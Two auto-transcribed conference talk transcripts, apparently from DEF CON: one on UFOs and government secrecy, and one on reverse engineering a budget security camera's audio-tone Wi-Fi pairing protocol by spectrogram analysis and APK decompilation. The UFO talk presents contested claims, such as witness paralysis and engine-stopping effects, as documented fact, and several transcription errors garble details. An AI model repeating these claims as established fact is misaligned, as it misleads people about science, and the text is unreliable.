how many hours we spent, we could not get slides to insert themselves in this video using the software we had to use. So, the slides that accompany this will be available on the DEF CON server, as well as at my website, which is themeworks.com, T-H-I-E-M-E-W-O-R-K-S.com. And you can go there and see them. Now, I'll also send them to you by email in PDF, PowerPoint, or keynote, if you like. Now, what is Luis Elizondo saying? Well, he said to me a couple of years ago in a conversation that the conversation about UAPs used to be at the water cooler, low level, and now it is happening at the highest levels of the Pentagon. And I can add that a former member of the Joint Chiefs of Staff confirmed that UFOs are real and have been observed and documented for a long time. Okay, so what's happening is UFOs are real. But those of us who have investigated this seriously and robustly and diligently and skeptically have known that that's been true for the last 70 years. But this time, the authoritative voice, if you will, 60 minutes, the New York Times, CNN, The Washington Post, The New Yorker, several senators, the head of NASA, they all constitute the quote unquote authoritative voice. And instead of dismissing or ridiculing the rest of us for reporting what we know, they confirmed that they are real. So this CBS, with 60 minutes saying those things, is not Walter Cronkite's CBS decades ago, half a century ago, when he debunked UFOs as not worthy of investigation. And that did happen to be a time when the CIA and CBS and many other major media had secret contracts. So what's happening is that authoritative voice is confirming that UFOs are real and are a security threat. In our book, UFOs in government, a historical inquiry, to which I'll refer again, because it's the gold standard for historical research into the subject. And we document that from the 40s to the 80s, using their own words, the government considered UFOs a security threat and investigated what they might be on that basis. So what else has been observed, according to Alessandro? Well, that there have been many more documented sightings than the videos you have seen, and then the hundred and some odd incidents to which they refer, many, many more documented sightings over the past 70 years. And he also affirmed that they enter and leave the atmosphere and travel with equal ease, whether in space or in the air or underwater. And that the propulsion system, which we really shouldn't call a propulsion system, because it doesn't seem to propel, it's a means of translation, as it were, from one vector of space time to another. And the velocities they achieve and their aerodynamics are still pretty much beyond our understanding and capabilities. Although I believe, and that's a belief, not a knowledge, that we have are doing and have been doing everything we can to learn how to do that. Well, often when you observe UFOs, there's what we could call a warp snap. They blur. They don't simply go fast. They blur and go out of sight or out of our space time, flying entirely or into a different dimensional reality. Or they could be going so fast from one point to another without impacts of gravity that they cannot be detected in motion by the eye or sensors. But our sensors are doing a good job of detecting them in other ways. The only alternative explanation in 1948 was that they were extraterrestrial if they weren't Russian or they weren't ours. Now we can add multi-dimensional and time travel, which if I have time I'll refer to. And so you know what I mean. So don't think of how things fly in the atmosphere. They don't fly. They don't action, reaction, propel one way and move another. They move in inexplicable ways. And often pilots report they seem to simply vanish. They are right in front of him in the air and simply disappear. So if they're not ours and they're not Russian or Chinese or from this planet, the only other explanation, however you frame it, is their off-world. Now you can call this report did that last category other if you like, but we know what they mean, right? Wink, wink, other indeed. So where are we? We're back to the twining memo. And we are back to what we were saying about this in public in the early 1950s. I'm going to pause this and get a map that is on one of the slides and show it to you so you can see what I mean. Okay, I'm back and here is a map that was in Look Magazine in 1952 when there was a lot of activity going on capturing everyone's attention. What you're seeing is a map of the United States and those circles and names are all of the military bases where UFOs were reported by the government. Got it? You can find this map in more detail on the web if you look up the article, Look Magazine, 1952 UFOs, and see the entire article. It's at Jan Aldrich's Project 1947 website. So that's what was happening and the twining memo to which I referred was happening. The twining memo, if you do not remember that from your UFO studies, was written in 1947 and it was from Lieutenant General Nathan Twining to Brigadier General George Shulgun about flying discs and he said, the phenomenon reported is something real. It is not visionary or fictitious. The reported operating characteristics such as extreme rates of climb, maneuverability and action, which must be considered evasive when cited by friendly aircraft and radar, this is all confirmed by multiple witnesses. That was 1947. So that's happening too that what we said and knew in 1947 is being said again as if it is new because it is the authoritative voice making the statement. Now one of our colleagues and researchers, Barry Greenwood, co-author of Clear Intent, which is the term the CIA use to characterize UFOs prodding the defenses at military sites along the Northern tier. He shared my surprise that the glum responses to the government report because there's some real gold there. The report notes that they're physical objects. Back in the 1950s, if you tried to look up flying saucer, which was a phrase that didn't exist yet in the Reader's Guide to Periodical Literature, which documented all popular articles, you didn't find flying saucer UFO. You found hoaxes and delusions. Well, things have changed because the report disclosed for the first time that those unusual flight characteristics to which Twining referred all those years ago have been documented by multiple sensors, including radar, infrared, electro-optical, our weapon seekers, and of course visual. And the report confirmed that they constitute a flight risk. The report mentioned 11 near-misses, although one of our colleagues, Richard Haynes, has been gathering accounts of such encounters from commercial pilots and military pilots and has amassed in his catalog of some years ago more than 3000 reports from them. So the report said, far from getting out of the business of studying UFOs, which they claim to have done after the Condom Committee report and the end of Project Blue Book theoretically, the government has been keenly interested in UFOs, particularly when they're poking around military bases. And very soon after the report was released, Kathleen Hicks, Deputy Secretary of Defense, issued a memo for senior Pentagon leadership commanders of combatant commands and defense agency and DOD field activity directors to institute synchronized collection, reporting, and analysis of UAP to secure test and training ranges and essentially to create a new infrastructure for this activity. So that's some of what's happening now. But isn't it interesting that all these things are being reported, including these latest videos, without any context at all? No historical context. But there is, as I am saying, a historical context. And the researchers to whom I have referred and others have tirelessly documented for decades a great deal of what that historical context is. And we use data that's in the public domain. Open source intelligence is frequently much more helpful than trying to ferret out compartmented, limited information. So let's look at what is really happening. Now this is where I would show you the slide of the cover of our book, UFOs and Government as Historical Inquiry. The main authors are Professor Michael Swartz, Professor of History, and the head of former head of the chemistry department at AMD, the chip maker, Robert Powell, who now heads up SCU, which is a scientific organization dedicated to really good analysis of these current cases. Well, our book had nearly 1000 footnotes and they all pointed to government documents and other primary sources. So we can tell the story of those decades in the government's own words. I highly recommend it, of course, as required reading to begin to understand the context of what is being released now without any context at all. Because it was long ago that, for example, J. Edgar Hoover said in 1947, the flying saucer situation is not all imaginary. Something is flying around. And I've already quoted from the twining memos. Well, there's a ton more. I'm looking over here to see what the time it is. And yeah, okay, we're good. There's a ton more of all that to adduce. But let's go beyond the fact of UFOs, the fact that they exist, the fact that they've been documented, to just name some of the documented impacts of UFOs. Here are some of the well documented effects of which we know. Within a variety of contexts, the emanation of microwave energy from UAPs has been induced. And UAPs have shown themselves capable of stimulating colored halos around themselves, largely from the noble gases in the atmosphere. In other words, the ionized nitrogen. And that causes the colors that are seen in relationship to the speed they go, which is determined by the power that they use, however they manufacture it. So when they hover, they're red or red orange. But as they accelerate, they go through other colors until they wind up going through yellow, green, and all the way to white and blue, white. And at the fastest speeds, they are a very, very intense blue, white. All of that relates very mathematically, very directly to the ionization of elements in the atmosphere around them. They have been documented to produce a dazzling white plasma on their surfaces, which is somewhat similar to ball lighting. They induce chemical changes in their presence, and they're detected as odors. They have turned off numerous times, automobile headlights or engines, by increasing the resistance of tungsten filaments. In other words, we can do some science with the effects that they produce. They have stopped internal combustion engines by increasing the resistance of the distributor points and suppressing the current in their primary windings. They have precipitated numerous times on planes and on the ground, wild gyrations of compasses and magnetic speedometers and rattling metallic road signs, which shake just like in the movie, Coast Encounters of the Third Kind. They have heated up automobile batteries by directly absorbing energy in the acid, and they have interfered with radio and television reception and transmission by inducing extraneous voltages in the coil of the tuned circuit or restricting the emission of electrons from tungsten cathodes. They have disrupted transmission of electrical power by an induced operation of isolation relays. They have desiccated small ponds and dried grass and bushes in the ground by resonant absorption of water molecules. They have charred or calcined grass roots, insects, wooden objects, and landing sites. In other words, they leave burnt circles. They have heated by tumenous highways in depth and igniting volatile gases. They have heated the human body internally, as microwaves do. They have caused people to feel electric shocks, and they have induced temporary paralysis in witnesses, numerous reports all over the world through time of moving toward a landed UFO or a hovering UFO and suddenly being unable to move, being conscious, volitional, but unable to move. In addition, medical experiments have shown that when pulsed at low audio frequency, the energy they emit was capable of stimulating the auditory nerve directly so that people have a sensation of hearing a humming or buzzing sound. Okay, that's the end of that list. Those are the effects and some of the causes of them, of which we have known for a long time. That is part of the context. And then there were incidents long ago, again back to 1952. I'm going to read this one directly. At a distance of 130 miles to the northeast of Washington, D.C., three different Army radar units detected an object at 18,000 feet. The signal was strong. It remained stationary on radar for 30 minutes and then began to move. By the time it reached the edge of the radar scopes, it was traveling over 1,000 miles per hour. The report went all the way to the Pentagon and the order came back that if another one came in, fire on it. After that first night, we loaded our 99-millimeter anti-aircraft guns, a rather unusual thing to do in a populated area, Washington, D.C., right? And we also scrambled F-94 jet fighters from McGuire Air Force Base. This was the time when Major General John Sanford, who was Chief of Air Force Intelligence, said, credible people have seen incredible things. Well, my slides and a few other details that you might want to investigate on your own are the RB-47 case and the Minot URL. The Minot case, as illuminated by Tom Turin, another colleague, online. The RB-47 bomber was paced for hours by UFO aircraft and ground radar and visual observation confirmed the event. You might find the details and how an explorer like Brad Sparks pursued the reality behind the reported effects. He wrote an article for the wonderful UFO Encyclopedia, the latest edition of which by Jerome Clark is just golden. And you can see Brad Sparks' article in the UFO Encyclopedia. Or you can go online to www.minotb52ufo.com and see how Tom Turin has provided details of the Minot intrusion at the Minot Air Force Base, including detailed interviews with pilots, what they saw, what they said. This is a good place to start, or you can look at the lowering Air Force Base case from October of 1975. FOIA listed 24 documents describing a V-52 bomber crew on the ground observing an object 300 feet away and 5 feet above the ground at that military installation. Or you can look at the document we received from the DIA by a FOIA request of the incident in Tehran, Iran in September of 1976, which details a dogfight between fighters and the UFO. An Iranian general later spoke publicly at a press conference confirming the event and the reports from the DIA says the cases of the highest credibility. I'm referring you all these cases because that's where you have to go if you want to know the context and the depth and the details of how this phenomena has manifested itself over so many years. Cases, cases, cases. Read them. Mike Swartz, our lead professor, said, I believe no one can be a good student of ufology unless one reads lots of cases. Cases are all we've got. Read them. Read them. Read them. Some reasonable sense, not all analytical, then follows what he's suggesting is as you peruse dozens, then hundreds, then thousands of cases from all over the world, you begin to get a feel like reading a tape in the stock market of hold or following the dots of any dynamic reality. You get a feel for what is going on on the basis of not just similarities but identical reports of effects and experiences from all over the world. You don't need 10,000 hours of case reading to do that, but you do need a lot of hours because there are so many cases and you begin to evaluate which ones you don't even want to read. You prefer two witnesses or more, not single witness cases. You don't worry about lights in the sky, period, as if that's all UFOs are. Read the cases. Read them. Read them. Read them. Now, one of the things that happens during these encounters is there's something that we call strangeness because we don't know what else to call it. People do report missing time, which can be caused by a number of things or finding yourself becoming conscious and far from where you had been when the encounter began, or you were traveling a busy road, there were sounds of traffic, or there were outdoor nature sounds, birds and insects, and suddenly there's silence. It's like being in a bell jar. We don't know what's happening. Is it a warping of space time somehow, or is it the impact of the phenomena on human consciousness? Because ultimately the impact of all of this on human consciousness, individual as well as societal, is where we have to go because that's how it comes home to us. That's how it's important. Are there patterns? Well, you look for them, but if there are patterns, they seem designed to confuse us. You can't say that's clearly the intention or certainly the intention, but they seem to act like deception operations because we can't identify an easy pattern, except I think there's one that is incontrovertible. All of the intermittent reinforcement of UFO encounters over the past years has resulted in all of us knowing about UFOs. In other words, they were hoaxes and delusions 70 years ago. Now they're UAPs. We all know how to draw UFO. Not all the UFOs are looked the same, but you know what I mean. You know what a classic UFO looks like. Prolonged exposure to intermittent reinforcement from manifestations in remote places, unusual places often and impossible to predict places, has sensitized us to the fact of their existence and presence, and has alerted us to the possibility and expectation of meaningful contact. We don't call them meant for Mars anymore. So it's important to look at the cases. It's important to grasp what you can from them, but it's important to understand that if you haven't done some of the homework and looked at the cases, we have amassed. Go to Project 1947 website, the Jan Allrich is done. Look at the Project Blue Book website. Look at all the work that we have done over 50 years of gathering documents. Barry Greenwood, to whom I referred, I think the last time he counted, he had 250,000 clippings on UFOs. It does help in this domain as in many others to be obsessive and compulsive, because that produces results. It's a feature. It's not a bug. Well, are we the only ones concerned? No, I don't think so. China created the government-sponsored China UFO Research Organization, or CURO, under their Academy of Social Sciences to study UFOs or UAPs. There is a People Liberation Army task force dedicated to unknown objects that increasingly relies on AI technology to analyze its data. Of course, we're not the only one interested. If there's a security implication, and if whoever susses out the sources of propulsion and maneuverability gets to it first, they own us. They own the planet, as indeed whatever is behind this phenomena has made clear, as Vrindavan Ram said many years ago, we're up against something that is far superior technology to what we thought. Well, China, in effect, by creating their own investigations, as we know Russia has done for one time and others as well, they're really kind of saying what Jenny Randall tells us. Alan Heineck, the astronomer associated with Project Blue Book in the Air Force, consultant said when he was at the Pentagon and a general took him inside and said, Alan, do you really think we would ignore something like this? Well, no, no. We don't think they have ignored it. And that's why we know this report is just the tip of the iceberg. It refers to 100-some-odd events recently. But knowing all that, knowing them has had a powerful impact on people over the years. And it does impact how you think it's right or best to report out things that originally were unthinkable. Well, now with the authoritative voice speaking, so the rest of us who've been speaking for years can be heard, it's not unthinkable. It's more than thinkable. It's known. And some of the effects of knowing something that can be so impactful, so traumatic, it can be a major restructuring of how we think. It can mean a major restructuring of society hierarchically so that the pieces that we put together into how we believe we ought to operate will fundamentally change knowing we, let's say, are not alone and are not the top of the food chain. Believe systems will stretch to accommodate new data. You know, the Roman Catholic Church said, no problem if aliens are real. We'll just baptize them. That's a belief system stretching to accommodate new data. Or sometimes people double down on their original beliefs. You know that. That the more something is shown to be incorrect, the more people assert it to be true. The political situation is testimony to that. And when I've been giving speeches on this or on intelligence matters or things that are a challenge for people, I often hear someone say, I don't want to know that. I don't want to live in your world. Well, that's a choice people make to hunker down in their bubble, play golf, do whatever they do to distract themselves from what's a little more important than making part. And I don't want to know that. Well, I've heard that enough to know that I do want to know it. I need to know machine. I'm a curiosity machine and curiosity is generally considered to be a good on a sign of intelligence. Although when I was doing a talk at Los Alamos and I was asking questions about their supercomputers, the respondent who didn't say much said, you know, curiosity is considered a good thing elsewhere. In here it's not. In other words, shut up. Well, how is this impacting people? Just ask Bill Nelson, who's now the head of NASA. You said when he was serving the Senate, he saw classified UAP data. Now, keep in mind that the report we've seen is seven pages and we are told that there were 70 pages and the rest was all classified. So we don't know what was in there other than that there were more details and more reports. Well, Nelson said when he heard the reports quote, the hair stood up on the back of my mouth. He said he also spoke with some of the pilots involved in the incident and he said they know they saw something. Well, the point of that is when the head of NASA and the senator hears a classified briefing and reports that the hair stood up on the back of his neck, it makes the hair stand up on the back of our necks because it adds to the implications of what we're discussing, the unknowns of what he did here and what we do know on top of what we have been able to fathom. So why would he say that? What else is not being said? How many classified pages of the report were not put out into the public? Well, we have hints right from the senators who heard it. Mark Warner, the chairman of the Senate Intelligence Committee said he was first briefed on UAPs nearly three years ago, long before 60 minutes did their little piece and since then he said the frequencies of these incidents only appears to be increasing. Today's inconclusive report is the beginning of efforts to understand and illuminate what is causing these risks to aviation in many areas around the country and the world. Marco Rubio, senator and vice chair of the Intelligence Committee said for years the men and women we trust to defend our country reported encounters with unidentified aircraft that had superior capabilities and for years their concerns were often ignored and ridiculed. This report is an important first step to catalog these incidents but it is just a first step. We have endured ridicule from these authoritative voices for decades. I've said before illusion, misdirection, ridicule. These are the three legs in the stool of covering deception and they are used effectively by agencies which have resources that are so extensive that the normal human cannot imagine, ridicule. Lawyers have hold seminars in how to ridicule a witness to completely undermine their credibility so that nothing they subsequently said even though it's the truth matters. Those of us who have pursued information about this for all these years know the effects of ridicule. Well, what is the way forward? What are we going to do? Whether or not the military pursues UFOs and earnest. There has to be a civilian program. The military from the first has focused on the threat to security but a civilian program can do science. Civilians, not just military, do science and what UFOs really are, what they constitute, remains a scientific problem. It's not just a question of intelligence or counterintelligence. We need a study well designed to develop a strategy to test our hypotheses about what they are and distinguish among the different UAPs. This comes from Mark Rodiger who is the head of the Kufo Center for UFO Studies. Mark is a very bright guy and he has worked in that area for decades and has shared the frustrations of not seeing the science supported that would enable us to do this. I mentioned SCU, you can look it up, Robert Powell, my colleague and co-author of UFOs government. They have done analyses of recent incidents including the ones we're talking about here that are scientific, that use teams of scientists and that only report out in up to 200 page reports of what they can verify is scientifically feasible and well documented. They approach it as a scientific problem and this is in contrast to how so many of the cottage industry of UFOites have pursued the problem which is by hearsay their own misinformation because they don't know what they don't know or what they do know and their disinformation sometimes sponsored and intentionally designed. So it has to be a scientific problem for us to address in scientific ways. UFOs constitute an existential threat. It could be a threat to security in general. The technology is something we don't know how to do and you know the analogies go back 200 years and describe cities aglow with electric lights and they'll sound like an idiot. The history of science is replete with the resistance humans mount against the truth when it threatens their belief systems and a superior technology like this invites disbelief and rebuffing it by saying oh that can't be true but anytime I find myself saying that can't be true I find it really pays to explore a little more. Don't forget that Richard Feynman said the keystone of advances in science is a fact that is also anomalous because it contradicts the belief system in which it doesn't fit. It has to be both. It has to be a fact. It can't be a non-fact and it has to be an anomaly. It has to be something that doesn't fit because then it prompts the question well if this is real, if this is true, if this is a fact where does it lead us? What else must be true? If these reports all these years have been true what does it tell us about covering deception operations? What does it tell us about how different government units operate as we document in our book? There's no one government. There's multiple government sectors and they're often at odds with each other just as in the intelligence agencies. A couple of dozen of them. People are often pursuing a goal but also highly or very much at odds with one another as well. Now the security question is real because if one of our terrestrial adversaries figures it out first, we toast, right? We toast. Every major military advance from stirrups to bullets to guns on and on has given unsurmountable advantage to the one who got to it first. It's an existential threat too because it's a challenge to our societal beliefs. It's a challenge to our cultures and it's a challenge to our religions. Our religions are extraordinary, resilient as we know. We continue to affirm religions formulated in the scientific worldview of 2000 years ago and successfully compartmentalize what we choose to ignore and what we choose to try to continue to affirm. But there does come a tilt. There does come a turning point which is why my church attendance is so far down in America where people listen to nonsense and just can't stand it any longer. I'm not saying religions are nonsensical. I'm saying they become the excuse to say things which in the rest of your life you know you don't believe and you don't act on those things you say, you act on your true beliefs. Well, a challenge to those beliefs and the challenge to those beliefs all the way up to the level of cultural linchpins is a serious existential threat. And then of course there's the unknown. How do we deal with the vast unknown and realizing how tiny we are, our galactic cluster, billions of galaxies with billions of planets in them. We know the universe is teeming with life. Easy to dismiss. Oh, where are they then? As if they should all be clamoring for our attention. Right? Like I want my aunt farm to pay attention when I walk into the room. It's not happening that way for good reason. We're not the top of the food chain and if we're the apple of God's eye we're discovering that there are millions of apples on those very big trees and as God loves all his apples we're just one apple. It's always a challenge when we have siblings and we find out our parents love them too. Right? Or as much as they love us. So what did make the hair on the back of his neck stand up? We want to know. For him it was a challenge and a shock. I went through that myself years ago when I first got into this domain and began hearing credible reports from fighter pilots, people in intelligence, people in the military, and just plain people who wanted to talk about what they'd experienced but which the authoritative voice had prevented from speaking loud lest they be told they were drunk or crazy or ridiculed in other ways. The time for that kind of nonsensical ridicule is over. This domain has had debunkers, not skeptics. Those of us who pursue the truth of this have been skeptical in the extreme. It's valuable in a scientific consciousness. Debunkers are people who like committed atheists saying no, no, no, the way committed believers say yes, yes, yes. They're just as committed to know as a believer as to yes and just as foolishly wedded to their commitment which is based on emotional grounds, not on the rational grounds they put forth as the reasons they believe what they believe. Where are the debunkers now? When it's not us, investigators on our own who are advocating for the reality and the phenomena, but the authoritative voices at all levels. Well, they're pretty quiet, aren't they? Where are the setting people like Seth Chastain who's been debunking us with superior smirking for years? He's flailing about in the weeds because he would have an awful lot more to attack than the straw men and women said he has invented in the pretense that their approach to discovering us to dress your life makes any sense at all. Well, I guess I'm going to wind it up here by making a pitch for intelligence, clarity, passion, commitment, and a radical willingness to open yourself to wherever the facts and the truth may lead. And today that's a difficult thing. The last slide has a picture of my latest book. I got to pitch it, right? Mobius a Memoir. 25 years of my experience working with security and intelligence professionals has finally poured in to a single narrative. And it's a novel because as I often say, a deputy director at the national security agency said, you can't talk about what we talk about with you. You have to write fiction. Fiction is the only way you can now tell the truth. He was right. Well, 37 published short stories and now two novels later. Mobius a Memoir is the most truth I can tell in a narrative that's coherent, artful, and includes that quarter century of deep listening to my colleagues. I encourage you to take a look at it. And soon if it's not there now, be at the Internet Archive as a borrowable download in digital form one at a time as the rules go. But you can of course buy it in Kindle or print at a very reasonable price. Check out my website for it. I'm going to repeat that HTTPS colon slash slash, which we don't have to say anymore. Theme works, thieme, w-o-r-k-s dot com. Once more, it has been a terrific privilege and a pleasure to be part of DEF CON 25 years after I first spoke here because this has been my home conference, a place where I'd never had to explain who I was because we all get it. We get who each other is straight up. And that's why we come back. So thank you for the invitation. Thank you for listening. And thank you for being committed to exploring the system in all its complexity and intricacy so you can take it apart and put it back together again in a way that works better. Thank you.
|
The talk, "UFOs and Government: A Historical Inquiry" given at Def Con 21 has been viewed thousands of times. It was a serious well-documented exploration of the UFO subject based on Thieme's participation in research into the subject with colleagues. The book of that name is the gold standard for historical research into the subject and is in 100+ university libraries. This update was necessitated by recent UFO incidents and the diverse conversations triggered by them. Contextual understanding is needed to evaluate current reports from pilots and naval personnel, statements from senators and Pentagon personnel, and indeed, all the input from journalists who are often unfamiliar with the field and the real history of documented UFOs over the past 70 years. Thieme was privileged to participate with scholars and lifelong researchers into the massive trove of reports. We estimate that 95% can be explained by mundane phenomena but the remainder suggest prolonged interaction with our planetary society over a long period. Thieme also knows that when you know you don't know something, don't suggest that you do. Stay with the facts, stay with the data. Sensible conclusions, when we do that, are astonishing enough. Reality, as Philip K. Dick said, will not go away just because we refuse to believe in it.
|
10.5446/54231 (DOI)
|
Hi, my name is Ryan Carter and today I'll be presenting on why my security camera screams like a banshee. Just talking on signal analysis and reverse engineering of an audio encoding protocol. Little bit about myself, I'm a software developer, security engineer. I love to code, love to automate, love to solve problems. I like to employ the hacker mindset, like to break things in cool and unexpected ways. To learn more about the system and hopefully drive an improvement that makes it better for everybody. I love food, love cooking, love baking, recipe hacking is a passion of mine and when I can get a delicious result, you know it really makes my day. And then of course the standard disclaimer applies here. All opinions are my own. Don't reflect the physicians or thoughts of anybody else or any current or previous employer. So let's get to it. Got a few different sections to cover. We're going to touch on what it is that we're actually doing here. The signal analysis piece, application analysis, hacking the signal and if all goes well, we'll get to a demo. So what are we doing here and why are we talking about wireless security cameras? So my original goal before I even had the idea to submit a DEF CON talk was to use an inexpensive wireless camera to monitor my garden. And this is the inexpensive camera I selected. It's got an antenna suitable for outdoor use. This one's kind of interesting in that it has a microphone and a speaker so you could have a two-way communication if you wanted it. And the nice thing about this is that it was cheap. So and it seemed like it would do the job. This sounds fairly easy and straightforward. So what's the catch here? I discovered after purchasing the camera, unboxing it and examining it that it requires a cloud application in order to enable and pair the camera. This there's no way to self set up the camera. There's no ad hoc wireless network. It doesn't show up with a Bluetooth connection. There's when you plug in the USB cable, there's no signals there whatsoever. Also there's no documentation online about this camera to any real technical depth. Not that I was expecting much from a $30 camera. And then of course what brings us here today is the bespoke protocol that it uses to, well that the vendor application uses to communicate and configure the wireless camera. So take a listen to this. This is what really piqued my interest and set me down the path of trying to do a DEFCON presentation. So that's the sound that this vendor application makes to interface with the camera and configure it to connect to a wireless network. I have to say I was not expecting that. It's not usually how you configure things like security cameras. So my mugal after finding out that it uses a sound wave signal to configure the camera is to find out what was going on during the camera setup and see if I can't hack on it and replicate it. If possible cast off the shackles of the proprietary cloud enabled app that the vendor supplies. So let's investigate. First thing you want to investigate is the hardware. And as I mentioned before, it does have a USB cable. This connector though only supplies power. When I trace the leads there's no activity on the data pins. Other investigative angles of course, check for Bluetooth, check for ad hoc Wi-Fi. And unfortunately after many hours of trying all sorts of different permutations of things, pressing the reset button, holding the reset button, scanning with wireless scanners, etc. Nothing was advertising. So that left me to investigate the software in a little bit more detail. This is the vendor application that comes with the camera. It's called Java. And it's used to configure the cloud camera. However, like I mentioned before, I wasn't really a fan of having to use this. This proprietary cloud locked application. Java requires an internet connection. It also requires a username and password to be configured with this cloud setup. So that may be a little frustrated and incentivize me to poke around some more. Now in order to analyze the vendor application, I needed a test device. I didn't want to run this on my primary phone, just being a security paranoid person that I am. I don't really have a trust for applications that come from DBS sources like the manufacturer of a $30 cloud-enabled camera. And as I searched online for information either about the camera or the application, probably not too surprising to hear that there wasn't very many, if any, results that were found. I did uncover a few other camera models that seemed to use the sound audio wave signal approach to configure the camera for Wi-Fi network. I don't have any of those though. And I just more list them here as an interesting aside. There are some cheap cameras though, which leverage in my opinion a far superior approach to pairing the camera to a wireless network. And that's having the app show a QR code that you then scan with the camera. The camera has, well, a camera. And scanning a QR code is a fairly straightforward thing to do in 2021. So I doubt or I should say I wonder if there'll be many, if any more cameras out there which leverage this audio coded approach. So now that we've taken a quick pass at the hardware and the software, let's think about this signal a little bit more, see what we can identify and figure out. And along the way, let's think about what are some things that we can think about or look for as we analyze this signal. Of course, the first thing is we'll want to capture and visualize the signal. We'll be looking for things like repetition, variation in replay. And if possible, we'll try to fuzz and simulate the signal in a way that can hopefully track with a valid encoding. This is the raw view of the signal as captured by audacity and visualized in the spectrographic view. Just taking a quick look at this. It's pretty clear that there are distinct tones and it appears to be steps. This isn't a continuous waveform that gets transmitted. It's individual tones which are given certain slices of time that are transmitted for a certain amount of time and then other tones are played after that. Taking a look, it seems like a lot of the signals are centering at least here around 3500 Hz with a few outwears on the low end of the frequency range and the high end as well. So this is something worth noting as we go about analyzing the signal. Now let's see. One thing that I thought as I was looking at the signal is, is this similar to a modem signal? It's been an awful long time since I've heard a modem and obviously modems encode their transmit information using an audio signal. So I did a quick comparison against a recording of 56K dial-up modem establishing a connection. Just by looking at these waveforms, it's pretty apparent that it's not a 56K modem. The spectrographs are substantially different and this audio protocol that they're using to configure the camera is bespoke in the sense that you can't find information about it easily and it doesn't track with other common audio protocols that you might think of like modem or fax. So looking a little closer at this with our eyes, I marked out a few sections that appeared interesting just really highlighting the signals that appear that are extraneous or that don't really track with what the rest of the signal offers. And on the left of this slide here, I put together, I guess what I'm calling a collapsed spectrograph view where I basically took all of the tones and I slid them all over to my left and just lined them up to see which tones and frequencies were represented. You can see that it does center around 3500 Hz. There's a small gap above 4000 Hz and then there appear to be some things at the higher register range. Now a picture is nice and it helps us understand maybe how the signal is structured. But a picture can only take us so far. We'd like to get more precise and better understand what is actually encoded in this signal and how the, and kind of what the protocol is for actually encoding data into the signal. With a manual approach, we can keep using a tool such as Audacity or other audio editing tools that are out there. With Audacity though, you can use this functionality called labeling. You position the cursor over each one of those sections where there appears to be a distinct tone. Press Ctrl B and it will cause Audacity to label that time slice and mark the frequency that's detected at that point in time. You can see just in this picture here, it might be a little smaller, a little hard to see, but I've got a bunch of labels on each one of these tones. This next view here is the Audacity view where you can view the labels that you've taken. You can go to Edit Labels, Edit Labels and you can export them to a text file which you know, you could run through some other type of automated analysis or plug it into a spreadsheet or what have you. Let's take a little closer look at this. You can see that Audacity is mapping a low and a high frequency that it detects at that time slice. These frequencies are a little variable. To me it looks like this puts us in the ballpark for what each of the target tones are. I don't imagine the vendor application is really putting out 5101.89 Hertz. It's probably something a bit more round. We'll figure out more about that as we go along in this process. What do we know now from doing our quick manual analysis? We can see that there is encoding going on. There's a digitized signal but the signal isn't binary. It's not like it's just two tones, one and zero. There's a range of frequencies represented here. There's some type of digital encoding going on. The frequencies seem to be centered in the 3-5 kilohertz range. My suspicion is that the signals that are outwears at the top and bottom are control signals and they weren't a closer look for investigating how the signal is put together. We see that there's repetition. I noticed that in my analysis of the vendor application and the pairing tones that it produces, the complete sequence repeats itself multiple times, at least three times. Then finally we can see that this is not a 56K modem or a fax signal. The spectral analyses just do not match. At this point, we have to ask ourselves, is there really much further that we can go in manual mode? The answer there is yes, but with a set of caveats. There's variability whenever you play back the audio signal. I found that each time I played back even the same signal from the vendor application, that audacity analysis would slightly vary in terms of which frequencies it shows when you do the labeling process. Of course, manually going through the process of playing a signal from an application, recording it into an audio editor, and doing that over and over again, is very time consuming since the app repeats the same signal multiple times. Then after you get a complete signal captured, you have to wait for the app to finish its full cycle before you can kick off another test permutation. Just to be clear, the only options we have to configure in this vendor application are the SSID and the passphrase for the wireless network. There's not a whole lot of things that you can vary for the input. One thing I noticed is that there's no readily apparent API to leverage the frequency detection portion of audacity. There's no CLI option, there's no readily available API option. While I could have dug deeper into the audacity code base to better understand how that's put together and hook into it, that really wasn't what I was trying to go for. That would be more of an aside as opposed to helping me on my main journey to reverse engineering better understand this audio signal. With manual mode, we can do black box signal reversing, we can try to brute force reproduce the tones, we can attempt to match generated tones with spectrographic views, and then of course just fuzzing, generating permutations until we find a match. This is a very tedious and time consuming process though. I was looking for a better way to leverage what I have and what I know in order to improve this process. Really the next step here is to do an analysis of the Android application since the Android application is what generates the audio signals. Let's take a closer look at this vendor application. How do we go about analysis of an artifact, of a software artifact? We can do things like executing it and logging the results in a sandbox or a test environment. We can decompile the package. We can look for strings, anything that might relate to audio or sound or SSIDs and passwords, things of that nature. We can do a key method search since Android uses a higher level language, at least I should say this APK is written to a higher level language. Even though vendors can obfuscate their code, it's a lot harder to obfuscate the underlying library functions that you use as a vendor. You can do a search for Android system calls or Android libraries that provide methods that you might need when dealing with audio and audio encoding. Once we figure out these code paths, we can attempt to do high-speed fuzzing. Then of course, if we identify something that has been obfuscated, we can try to go and de-obfuscate it and attribute the classes, the methods, the properties, some other identifiers which makes more sense to humans and helps us better reason about the code to really figure out how this all works. Now, let's talk a little bit about preparation. You'll need to prepare your computer to pull the APK off of your test device. If you've worked with Android before, you're probably already familiar with this. You need to make sure your developer mode is enabled, that you've allowed USB debugging, make sure that you have Android Studio installed and that version of ADB is correctly placed in your path so that way you can leverage it for the purposes of this. You'll want to extract the Android package. Here I show a few commands that you can use if you want to follow along afterwards and try this. You'll want to make sure that you take the output of each step and feed it into the next step, since what I have here is really only applicable to a BlackBerry priv. This is the test device that I had lying around after all these years to do this analysis on. Once you have the APK, you can use a tool to decompile it. I leveraged a JADX. You can go to the GitHub page, pull the latest release, and then it's a very simple tool to decompile the code, just a quick one-liner. You will probably note that it'll show finished with errors. I found that the errors did not negatively impact my analysis of the package and I was not impeded in my journey. Once you have the decompiled sources, you'll want to open up a new Android Studio project, open the decompiled sources from JADX, and then click a little button in the lower right hand corner that says, configure the Android framework. By configuring the Android framework, it enables you to do things like find usages and go to definition, just all the goodness that you'd expect from a modern IDE. Once it's loaded, you'll see a bunch of classes on the side. The one that I have highlighted there is u.aly, which is clearly obfuscated. As you drill into there, there's a bunch of obfuscated classes and methods. Now a quick note on obfuscated code. What is obfuscation? Sometimes software makers want to hide their implementations. They want to impede you from figuring out how they work and from reverse engineering it to better understand what the underlying mechanisms of its operation are. With higher level languages, you get terse randomly generated identifiers. You might have a class named lowercase a. You might have a method named f999, or whatever the case may be. It's harder to obfuscate the use of system libraries in a higher level language since those decompile cleanly back to base libraries. Why do we use Android Studio? Or what's the advantage of using Android Studio in your manual 